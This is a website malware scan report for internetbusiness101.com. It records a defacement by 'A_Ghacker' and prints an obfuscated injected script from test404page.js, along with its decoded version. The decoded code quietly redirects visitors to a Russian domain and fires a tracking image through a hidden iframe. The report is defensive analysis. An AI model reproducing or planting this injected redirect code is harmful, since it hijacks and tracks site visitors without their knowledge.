New scan:

Malware Scanner report for internetbusiness101.com

Malicious/Suspicious/Total urls checked
0/1/15
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

You Got Hacked By A_Ghacker  (4 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://internetbusiness101.com/
200 OK
Content-Length: 11887
Content-Type: text/html
suspicious
Deface/Content modification. The following signature was found: You Got Hacked By A_Ghacker

...[703 bytes skipped]...
root" />
<meta name="copyright" content="msfconsole_meta"/>
<meta name="description" content="msfconsole_meta"/>
<body oncontextmenu="return false" onkeydown="return false">

<script language="JavaScript">


function tb5_makeArray(n){
this.length = n;
return this.length;
}

tb5_messages = new tb5_makeArray(5);
tb5_messages[0] = "You Got Hacked By A_Ghacker";
tb5_messages[1] = "We are arab Hackers";
tb5_messages[2] = "We Love Hacking!";
tb5_messages[3] = "Gray Hat Hacker Here!";
tb5_messages[4] = "Don't Worry";
tb5_messages[5] = "Your DataBase Is Safe";
tb5_messages[6] = "We just want to inform you that your site security is low .";
tb5_messages[7] = "Fixed it as soon possible, or else other hacker will hacked your system !";
tb5_rptType = 'infinite';
tb5_rptNbr = 10;
tb5_speed =
...[12070 bytes skipped]...


https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js
200 OK
Content-Length: 93435
Content-Type: text/javascript
clean
http://internetbusiness101.com/test404page.js
200 OK
Content-Length: 62110
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)
...[622 bytes skipped]...

Decoded script:

...[377 bytes skipped]...
pVersion.indexOf("Win")==-1){
var _vu_u="47df99045433a8c590cfeb72d5dc6b9c", _vu_i="a78f966dbb4d07385d831dab60cd79e2";
if(_vr_c(_vu_u)===undefined){_vc_c(_vu_u,_vu_i,5);
if(_vr_c(_vu_u)==_vu_i){window.location.href="http://mobi-auto.ru/m/";}
}}
function dpp(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}i=1;return;}
<iframe onload="return dpp(this);" style="width:66%;height:66%;" src="about:blank"></iframe>
</div>
function _vr_c(k){return(document.cookie.match('(^|; )'+k+'=([^;]*)')||0)[2]}
function _vc_c(name,value,d){var date=new Date();date.setTime(date.getTime()+(d*86400000)

http://internetbusiness101.com/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://internetbusiness101.com/wp-content/plugins/gtranslate/jquery-translate.js?ver=3.5.1
200 OK
Content-Length: 16301
Content-Type: application/javascript
clean
http://internetbusiness101.com/wp-content/plugins/tubepress/src/main/web/js/tubepress.js?ver=3.5.1
200 OK
Content-Length: 3832
Content-Type: application/javascript
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js
200 OK
Content-Length: 34843
Content-Type: application/javascript
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php
200 OK
Content-Length: 26810
Content-Type: text/html
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/
200 OK
Content-Length: 940
Content-Type: text/html
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/
200 OK
Content-Length: 833
Content-Type: text/html
clean
http://internetbusiness101.com/wp-content/plugins/
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/README.txt
200 OK
Content-Length: 3425
Content-Type: text/plain
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/content-gallery.php
200 OK
Content-Length: 219
Content-Type: text/html
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/css/
200 OK
Content-Length: 560
Content-Type: text/html
clean
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/css/img/
200 OK
Content-Length: 906
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: internetbusiness101.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 30 Sep 2015 01:52:29 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 11887
Content-Type: text/html
Last-Modified: Mon, 10 Aug 2015 14:13:42 GMT

...11887 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: internetbusiness101.com
Referer: http://www.google.com/search?q=internetbusiness101.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=internetbusiness101.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://internetbusiness101.com/

Result: internetbusiness101.com is not infected or malware details are not published yet.